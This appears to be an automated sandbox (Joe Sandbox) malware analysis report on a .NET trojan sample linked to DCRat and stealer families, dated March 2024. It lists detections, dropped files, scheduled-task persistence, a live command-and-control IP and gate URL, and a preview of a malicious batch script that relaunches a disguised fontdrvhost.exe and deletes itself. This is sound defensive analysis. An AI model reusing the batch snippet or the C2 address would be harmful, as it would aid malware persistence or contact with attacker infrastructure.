                        System Network Configuration Discovery                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                        Obfuscated Files or Information                        		Cached Domain Credentials2
                        File and Directory Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                        Software Packing                        		DCSync34
                        System Information Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        DLL Side-Loading                        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1417387 Sample: ZT3pxe2Tb4.exe Startdate: 29/03/2024 Architecture: WINDOWS Score: 100 187 Snort IDS alert for network traffic 2->187 189 Antivirus detection for dropped file 2->189 191 Antivirus / Scanner detection for submitted sample 2->191 193 9 other signatures 2->193 14 ZT3pxe2Tb4.exe 4 30 2->14         started        18 fontdrvhost.exe 14 27 2->18         started        21 fontdrvhost.exe 2 2->21         started        process3 dnsIp4 153 C:\Users\user\Desktop\zsrQNmVQ.log, PE32 14->153 dropped 155 C:\Users\user\Desktop\xvPIrmGV.log, PE32 14->155 dropped 157 C:\Users\user\Desktop\wHLAFYKX.log, PE32 14->157 dropped 165 20 other malicious files 14->165 dropped 205 Detected unpacking (creates a PE file in dynamic memory) 14->205 207 Uses schtasks.exe or at.exe to add and modify task schedules 14->207 209 Creates processes via WMI 14->209 23 cmd.exe 1 14->23         started        26 schtasks.exe 14->26         started        28 schtasks.exe 14->28         started        30 schtasks.exe 14->30         started        185 89.23.98.225, 49730, 49731, 49738 MAXITEL-ASRU Russian Federation 18->185 159 C:\Users\user\Desktop\ylQifTUJ.log, PE32 18->159 dropped 161 C:\Users\user\Desktop\uvZrYWTP.log, PE32 18->161 dropped 163 C:\Users\user\Desktop\pzYaRqdW.log, PE32 18->163 dropped 167 19 other malicious files 18->167 dropped 211 Antivirus detection for dropped file 18->211 213 Multi AV Scanner detection for dropped file 18->213 215 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 18->215 217 Machine Learning detection for dropped file 18->217 32 cmd.exe 1 18->32         started        file5 signatures6 process7 signatures8 197 Uses ping.exe to sleep 23->197 199 Uses ping.exe to check the status of other devices and networks 23->199 34 fontdrvhost.exe 26 23->34         started        37 conhost.exe 23->37         started        39 PING.EXE 1 23->39         started        41 chcp.com 1 23->41         started        43 fontdrvhost.exe 32->43         started        45 conhost.exe 32->45         started        47 PING.EXE 1 32->47         started        49 chcp.com 1 32->49         started        process9 file10 113 C:\Users\user\Desktop\zfzIrCEh.log, PE32 34->113 dropped 115 C:\Users\user\Desktop\sXAbZyyE.log, PE32 34->115 dropped 117 C:\Users\user\Desktop\phJkSByL.log, PE32 34->117 dropped 125 19 other malicious files 34->125 dropped 51 cmd.exe 34->51         started        119 C:\Users\user\Desktop\zntiAIEO.log, PE32 43->119 dropped 121 C:\Users\user\Desktop\yEAAOeyR.log, PE32 43->121 dropped 123 C:\Users\user\Desktop\xHZssejW.log, PE32 43->123 dropped 127 19 other malicious files 43->127 dropped 54 cmd.exe 43->54         started        process11 signatures12 195 Uses ping.exe to sleep 51->195 56 fontdrvhost.exe 51->56         started        59 conhost.exe 51->59         started        61 chcp.com 51->61         started        63 PING.EXE 51->63         started        65 fontdrvhost.exe 54->65         started        67 conhost.exe 54->67         started        69 chcp.com 54->69         started        71 PING.EXE 54->71         started        process13 file14 137 C:\Users\user\Desktop\zldaSYtH.log, PE32 56->137 dropped 139 C:\Users\user\Desktop\wsOrhbIJ.log, PE32 56->139 dropped 141 C:\Users\user\Desktop\nJvbxzCb.log, PE32 56->141 dropped 149 19 other malicious files 56->149 dropped 73 cmd.exe 56->73         started        143 C:\Users\user\Desktop\sihlzJJp.log, PE32 65->143 dropped 145 C:\Users\user\Desktop\rudcNvNr.log, PE32 65->145 dropped 147 C:\Users\user\Desktop\rmtKjMmm.log, PE32 65->147 dropped 151 19 other malicious files 65->151 dropped 75 cmd.exe 65->75         started        process15 signatures16 78 fontdrvhost.exe 73->78         started        81 conhost.exe 73->81         started        83 chcp.com 73->83         started        85 w32tm.exe 73->85         started        201 Uses ping.exe to sleep 75->201 87 fontdrvhost.exe 75->87         started        89 conhost.exe 75->89         started        91 chcp.com 75->91         started        93 PING.EXE 75->93         started        process17 file18 169 C:\Users\user\Desktop\zReaumVj.log, PE32 78->169 dropped 171 C:\Users\user\Desktop\xgyKnYKq.log, PE32 78->171 dropped 173 C:\Users\user\Desktop\xOrrZDRn.log, PE32 78->173 dropped 181 19 other malicious files 78->181 dropped 95 cmd.exe 78->95         started        175 C:\Users\user\Desktop\zuGjoWSN.log, PE32 87->175 dropped 177 C:\Users\user\Desktop\zTojkKNX.log, PE32 87->177 dropped 179 C:\Users\user\Desktop\uHokLZDZ.log, PE32 87->179 dropped 183 19 other malicious files 87->183 dropped 97 cmd.exe 87->97         started        process19 process20 99 fontdrvhost.exe 95->99         started        102 conhost.exe 95->102         started        104 chcp.com 95->104         started        106 w32tm.exe 95->106         started        108 conhost.exe 97->108         started        file21 129 C:\Users\user\Desktop\zzDSBAiP.log, PE32 99->129 dropped 131 C:\Users\user\Desktop\wOXBumXW.log, PE32 99->131 dropped 133 C:\Users\user\Desktop\sYhLnqXd.log, PE32 99->133 dropped 135 19 other malicious files 99->135 dropped 110 cmd.exe 99->110         started        process22 signatures23 203 Uses ping.exe to sleep 110->203

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        ZT3pxe2Tb4.exe87%ReversingLabsByteCode-MSIL.Trojan.Zusy
                        ZT3pxe2Tb4.exe73%VirustotalBrowse
                        ZT3pxe2Tb4.exe100%AviraHEUR/AGEN.1323342
                        ZT3pxe2Tb4.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Temp\6WkFIbRMFr.bat100%AviraBAT/Runner.IK
                        C:\Users\user\AppData\Local\Temp\I3W1TCNLwG.bat100%AviraBAT/Runner.IK
                        C:\Users\user\AppData\Local\Temp\s2nU7uS06N.bat100%AviraBAT/Runner.IL
                        C:\Users\user\Desktop\DACRVJoK.log100%AviraHEUR/AGEN.1362695
                        C:\Users\user\AppData\Local\fontdrvhost.exe100%AviraHEUR/AGEN.1323342
                        C:\Users\user\AppData\Local\Temp\ZMh4UPVO0I.bat100%AviraBAT/Runner.IL
                        C:\Users\user\Desktop\CgRzmzKC.log100%AviraTR/PSW.Agent.qngqt
                        C:\Users\user\AppData\Local\Temp\OwDUg2gYJx.bat100%AviraBAT/Runner.IK
                        C:\Users\user\Desktop\ELDRalsN.log100%AviraHEUR/AGEN.1300079
                        C:\Users\user\AppData\Local\Temp\wuC6fcDv5B.bat100%AviraBAT/Runner.IK
                        C:\Users\user\AppData\Local\Temp\Gu3WPocxsu.bat100%AviraBAT/Runner.IL
                        C:\Users\user\AppData\Local\Temp\7nxekELsf0.bat100%AviraBAT/Runner.IK
                        C:\Users\user\Desktop\CGTrJaEm.log100%AviraTR/PSW.Agent.qngqt
                        C:\Users\user\Desktop\AFOsBjYP.log100%AviraHEUR/AGEN.1300079
                        C:\Users\user\AppData\Local\Temp\e2HUAivGfO.bat100%AviraBAT/Runner.IK
                        C:\Users\user\AppData\Local\Temp\3IMqqsTTOd.bat100%AviraBAT/Runner.IK
                        C:\Users\user\Desktop\CTQIQVae.log100%Joe Sandbox ML
                        C:\Users\user\Desktop\CkrRJHNx.log100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\fontdrvhost.exe100%Joe Sandbox ML
                        C:\Users\user\Desktop\AaPSReOe.log100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\fontdrvhost.exe87%ReversingLabsByteCode-MSIL.Trojan.Zusy
                        C:\Users\user\AppData\Local\fontdrvhost.exe73%VirustotalBrowse
                        C:\Users\user\Desktop\AFOsBjYP.log17%ReversingLabs
                        C:\Users\user\Desktop\AFOsBjYP.log20%VirustotalBrowse
                        C:\Users\user\Desktop\AaPSReOe.log5%ReversingLabs
                        C:\Users\user\Desktop\AaPSReOe.log7%VirustotalBrowse
                        C:\Users\user\Desktop\BxnIYuRz.log12%ReversingLabs
                        C:\Users\user\Desktop\BxnIYuRz.log4%VirustotalBrowse
                        C:\Users\user\Desktop\CGTrJaEm.log67%ReversingLabsByteCode-MSIL.Trojan.Generic
                        C:\Users\user\Desktop\CGTrJaEm.log69%VirustotalBrowse
                        C:\Users\user\Desktop\COTaDrJc.log10%ReversingLabs
                        C:\Users\user\Desktop\COTaDrJc.log21%VirustotalBrowse
                        C:\Users\user\Desktop\CQeYyQPa.log8%ReversingLabs
                        C:\Users\user\Desktop\CQeYyQPa.log6%VirustotalBrowse
                        C:\Users\user\Desktop\CTQIQVae.log5%ReversingLabs
                        C:\Users\user\Desktop\CTQIQVae.log7%VirustotalBrowse
                        C:\Users\user\Desktop\CdkYHFFH.log9%ReversingLabs
                        C:\Users\user\Desktop\CdkYHFFH.log6%VirustotalBrowse
                        C:\Users\user\Desktop\CgRzmzKC.log67%ReversingLabsByteCode-MSIL.Trojan.Generic
                        C:\Users\user\Desktop\CgRzmzKC.log69%VirustotalBrowse
                        C:\Users\user\Desktop\CkrRJHNx.log12%ReversingLabs
                        C:\Users\user\Desktop\CkrRJHNx.log8%VirustotalBrowse
                        C:\Users\user\Desktop\DACRVJoK.log12%ReversingLabs
                        C:\Users\user\Desktop\DACRVJoK.log7%VirustotalBrowse
                        C:\Users\user\Desktop\DEcjsSrF.log12%ReversingLabs
                        C:\Users\user\Desktop\DEcjsSrF.log4%VirustotalBrowse
                        C:\Users\user\Desktop\DQsQlVoZ.log12%ReversingLabs
                        C:\Users\user\Desktop\DQsQlVoZ.log4%VirustotalBrowse
                        C:\Users\user\Desktop\DdBAnNSZ.log12%ReversingLabs
                        C:\Users\user\Desktop\DdBAnNSZ.log4%VirustotalBrowse
                        C:\Users\user\Desktop\DnshUSLJ.log17%ReversingLabs
                        C:\Users\user\Desktop\DnshUSLJ.log4%VirustotalBrowse
                        C:\Users\user\Desktop\ELDRalsN.log8%ReversingLabs
                        C:\Users\user\Desktop\ELDRalsN.log4%VirustotalBrowse
                        C:\Users\user\Desktop\EOpBrqDR.log9%ReversingLabs
                        C:\Users\user\Desktop\EOpBrqDR.log6%VirustotalBrowse
                        C:\Users\user\Desktop\EQFIYaOX.log17%ReversingLabs
                        C:\Users\user\Desktop\EQFIYaOX.log6%VirustotalBrowse
                        C:\Users\user\Desktop\FWXhQVXq.log17%ReversingLabs
                        C:\Users\user\Desktop\FWXhQVXq.log20%VirustotalBrowse
                        C:\Users\user\Desktop\FWzHsBqG.log9%ReversingLabs
                        C:\Users\user\Desktop\FWzHsBqG.log7%VirustotalBrowse

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://89.23.98.2250%Avira URL Cloudsafe
                        http://89.23.98.225/8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generato0%Avira URL Cloudsafe
                        http://89.23.98.225/8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php0%Avira URL Cloudsafe
                        http://89.23.98.225/8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generato0%VirustotalBrowse
                        http://89.23.98.225/8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php0%VirustotalBrowse
                        http://89.23.98.2250%VirustotalBrowse

                        Domains and IPs

                        Contacted Domains

                        No contacted domains info

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://89.23.98.225/8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.phptrue
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://89.23.98.225fontdrvhost.exe, 00000008.00000002.1704980568.0000000003102000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000000E.00000002.1796124572.00000000035D7000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000015.00000002.1883168171.0000000003347000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000002.1932041291.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000022.00000002.2017458339.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000023.00000002.2120982731.00000000033F7000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000002A.00000002.2116613612.0000000003855000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2490608916.000000000363C000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2251980191.0000000002F84000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://89.23.98.225/8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generatofontdrvhost.exe, 00000034.00000002.2251980191.0000000002F84000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameZT3pxe2Tb4.exe, 00000000.00000002.1647722543.0000000003A79000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000008.00000002.1704980568.0000000003102000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000000E.00000002.1796124572.00000000035D7000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000015.00000002.1883168171.0000000003347000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000002.1932041291.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000022.00000002.2017458339.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000023.00000002.2120982731.00000000033F7000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000002A.00000002.2116613612.0000000003855000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2490608916.000000000363C000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2251980191.0000000002F84000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          89.23.98.225
                          		unknownRussian Federation
                          		48687MAXITEL-ASRUtrue

                          General Information

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1417387
                          Start date and time:2024-03-29 07:36:08 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 11m 4s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:65
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:ZT3pxe2Tb4.exe
                          renamed because original name is a hash value
                          Original Sample Name:4164D5955C244FF266C1CC41013FE21A.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@93/244@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:Failed
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, SIHClient.exe, conhost.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          06:36:56Task SchedulerRun new task: fontdrvhost path: "C:\Users\user\AppData\Local\fontdrvhost.exe"
                          06:36:56Task SchedulerRun new task: fontdrvhostf path: "C:\Users\user\AppData\Local\fontdrvhost.exe"
                          07:37:00API Interceptor9x Sleep call for process: fontdrvhost.exe modified

                          Joe Sandbox View / Context

                          IPs

                          No context

                          Domains

                          No context

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          MAXITEL-ASRU919KMNiWfM.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                          • 89.23.96.177
                          WyuZdl33w7.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                          • 89.23.96.177
                          q3JT7kcpCR.exeGet hashmaliciousDCRatBrowse
                          • 89.23.97.121
                          qqeng.pdf.lnkGet hashmaliciousRHADAMANTHYSBrowse
                          • 89.23.98.210
                          Instruction.pdf.lnkGet hashmaliciousUnknownBrowse
                          • 89.23.98.210
                          ArfJNHXaQ4.exeGet hashmaliciousPureLog Stealer, RisePro StealerBrowse
                          • 89.23.99.219
                          whitelist.pdf.lnkGet hashmaliciousUnknownBrowse
                          • 89.23.98.210
                          ChromeSetup.exe.lnkGet hashmaliciousUnknownBrowse
                          • 89.23.98.210
                          install.pdf.lnkGet hashmaliciousRHADAMANTHYSBrowse
                          • 89.23.98.210
                          Instruction.pdf.lnkGet hashmaliciousRHADAMANTHYSBrowse
                          • 89.23.98.210

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          C:\Users\user\Desktop\AaPSReOe.logO5OjRoFGIW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                            iY40ylvr5y.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              qObijSd3Uj.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                2EHDj2G1ow.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                  k6AIKkidxG.exeGet hashmaliciousDCRatBrowse
                                    file.exeGet hashmaliciousDCRatBrowse
                                      Um5hcJ3WPo.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        y48nZSvYdA.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          919KMNiWfM.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            WyuZdl33w7.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                              C:\Users\user\Desktop\AFOsBjYP.logO5OjRoFGIW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                iY40ylvr5y.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  7GTGpZi6oi.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    GWCscceJsW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      QHZoYVBjSD.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                        qObijSd3Uj.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                          2EHDj2G1ow.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                            UU5WXfH85a.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              k6AIKkidxG.exeGet hashmaliciousDCRatBrowse
                                                                vFfb4XhxQq.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\5b884080fd4f94

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:ASCII text, with very long lines (917), with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):917
                                                                  Entropy (8bit):5.900948306563715
                                                                  Encrypted:false
                                                                  SSDEEP:24:6cF0/r8duy8wnaq0Ml0lJ5wsV19jVuy6/Iku1/LU5V9:A4n8wnaDocQQ90y6/O/4J
                                                                  MD5:B8545BA39B8A7B3EA05F4EF0CE53D95B
                                                                  SHA1:33B779ACB3FFDCFE8447D970E2E8E83F0BF5D749
                                                                  SHA-256:BE89C6D26AA1DA38C7371EE80E805CDA89940C734D8C9869F6FB4E1284917D3F
                                                                  SHA-512:6F12B7C0FEF7451D040C33A42D9B0E61213A6E01A357A3064C95FA918CA45FD25C056A8B5F51C59EC60DBFCB6C0E128C98CE1DFA0506329E11707DFB94FFAAD5
                                                                  Malicious:false
                                                                  Preview:WuxZGHcBQLJHQjqXl8qUHNMG4xmBPjXfsDCuC0H4DXbWJZalmvm3JixIiqfSeawqxoZMg6Uu0wRuw07fWAZe6eWJQ4MWVyZmkuif9OFpa2CXRCWrsA6eBStTSP6lu7YBWpKBRcfI5tDEb82OienV25lRAONuRd5ddBAl2UZQeyiRPp2TXsDPTDJbE2ACPv0cxkla7RVOEX0DWTBVW4XjZqJa1jh9TXBt8GdpEcVGWzK6MFEu0pqVYQCHaKiYtW4rVGFQzWR4iQNkfMNwfwIorqVrDWO347WA4dlFAx5eXvwHDcmO7v26NQAovXMdHYAl4MpClHwr1oQ54OoluA5IEawnc6UmlbW9uKM0wjnz9LEjAFugtltHc2heaCjowKGaRQKtBxzKWGI3VNnXMy2AsPg2nsauA8CzEoRt4Ae6viuWtoINYMc8RGrCtSGTXFJXDTyq53dLT6OJeKJ8jNVxgEh87P9m3LiqZWTZ0cRetRpV1hhjIItKtW19vztq30RIXhuH1tIH50EPYMGZradvbY7CfToAslk29g7TwarZ9mO2RmkisT8dXfq8krmhFIYUQLP2PwnRsEwzKFv2tFRZmHfe08tExJT0O3mFXsT6qruSt1yf6uyA18sIqvCQDidiv5lRcpfAwVt4WNu8KOIDVT9PLdZlqC2HOLhxQgCROxOfPywdADFyaZNc5VG9P4UtclqKq7snL0zhEeAWq6km7Dry8E14aCBUcfDnHlwDVbnjkqXbVtTTTswY41MlFxNJyeEjaWPEJhRfaHNSrajrtsButosPZL8hOdvFlxA8dOJvbQ7wo33pOfaFdU0wo9o8jtQ7WIq3ZkNejPTcq5lfRSTtDplR7OUejLMr9AafM9PnR5gOAYFsXJqQah3rgZ6LQt5YDlcpfFSSDpbHIXQiI

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ZT3pxe2Tb4.exe.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1915
                                                                  Entropy (8bit):5.363869398054153
                                                                  Encrypted:false
                                                                  SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4vHNpv:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4vb
                                                                  MD5:0C47412B6C6EF6C70D4B96E4717A5D3B
                                                                  SHA1:666FCC7898B52264D8A144600D7A3B0B59E39D66
                                                                  SHA-256:0B3F6655476FA555F55859443DE496AF7279529D291EF9745C22C5C283B648F9
                                                                  SHA-512:4E51FCBCA176BF9C5175478C23AE01445F13D9AC93771C7F73782AF9D98E8544A82BBFB5D3AA6E2F3ECF1EFB59A8466EB763A30BD795EFE78EE46429B2BEAC6C
                                                                  Malicious:false
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\fontdrvhost.exe.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1915
                                                                  Entropy (8bit):5.363869398054153
                                                                  Encrypted:false
                                                                  SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHpHNpaHKlT4x:iqbYqGSI6oPtzHeqKktwmj0qV1Jtpaq2
                                                                  MD5:73E7DD0D3AE6532ADBC6411F439B5DE3
                                                                  SHA1:427BE8DB5338D856906C1DDFBD186319A02F7567
                                                                  SHA-256:A80934D9E4D8FC0BBE46BD76A4FE0F66125C03B5A8F83265420242BE975DC8EE
                                                                  SHA-512:33FD10A43B9E16EAF568113F7298D34A730D9040693473A15739AED86228828095E42E16617D06F52363F970D517AD7D052FE520A9924EEC0A93F657CB631855
                                                                  Malicious:false
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

                                                                  C:\Users\user\AppData\Local\Temp\3IMqqsTTOd.bat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):172
                                                                  Entropy (8bit):5.061279544314783
                                                                  Encrypted:false
                                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1t+kiE2J5DQDWCSBktKcKZG1t+kiE2J5xAIdoUJf:hCRLuVFOOr+DE1wkn238GKOZG1wkn235
                                                                  MD5:D87CA980DB5E8FB9F78181AAF84F3564
                                                                  SHA1:FCD3953587B76A041A2DF96DF94AB0A24F36A912
                                                                  SHA-256:E957690A3C212FD8A7D58AF8940B4DADAF8EB526EB223F907FC43F31E3BEB733
                                                                  SHA-512:155F247762B10098A6E612165AD972B87402DC109B93B1718DC2C8B44E94F2C8E461B21B707F60FAA056DB44D59BC7B8879A602B1B5CA5C395CE0097336BC9BF
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Local\fontdrvhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\3IMqqsTTOd.bat"

                                                                  C:\Users\user\AppData\Local\Temp\6WkFIbRMFr.bat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):172
